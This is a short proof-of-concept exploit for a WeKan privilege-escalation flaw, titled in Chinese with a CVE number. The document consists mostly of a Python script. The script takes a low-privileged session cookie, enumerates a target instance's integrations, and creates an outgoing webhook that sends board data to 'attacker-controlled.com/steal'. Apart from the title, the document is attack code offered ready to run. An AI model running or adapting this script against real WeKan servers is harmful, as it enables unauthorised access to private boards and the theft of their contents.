CVE-2026-41454 WeKan集成API权限提升漏洞

import requests # Target configuration target_url = "http://target-wekan-instance.com/api/integrations" # Attacker's session cookie (obtained after logging in as a low-privileged board member) session_cookie = { "wekan-sid": "valid_low_privileged_session_id" } # 1. Enumerate existing integrations (Information Disclosure) def enumerate_integrations(): response = requests.get(target_url, cookies=session_cookie) if response.status_code == 200: print("[+] Successfully enumerated integrations:") print(response.json()) else: print("[-] Failed to enumerate integrations.") # 2. Create a malicious integration (Integrity Impact) def create_malicious_integration(): payload = { "type": "outgoing-webhook", "url": "http://attacker-controlled.com/steal", "boardId": "target_board_id" } # Note: The endpoint might vary based on the specific JsonRoutes implementation create_url = target_url response = requests.post(create_url, json=payload, cookies=session_cookie) if response.status_code == 200: print("[+] Successfully created malicious integration.") else: print(f"[-] Failed to create integration. Status: {response.status_code}") if __name__ == "__main__": enumerate_integrations() create_malicious_integration()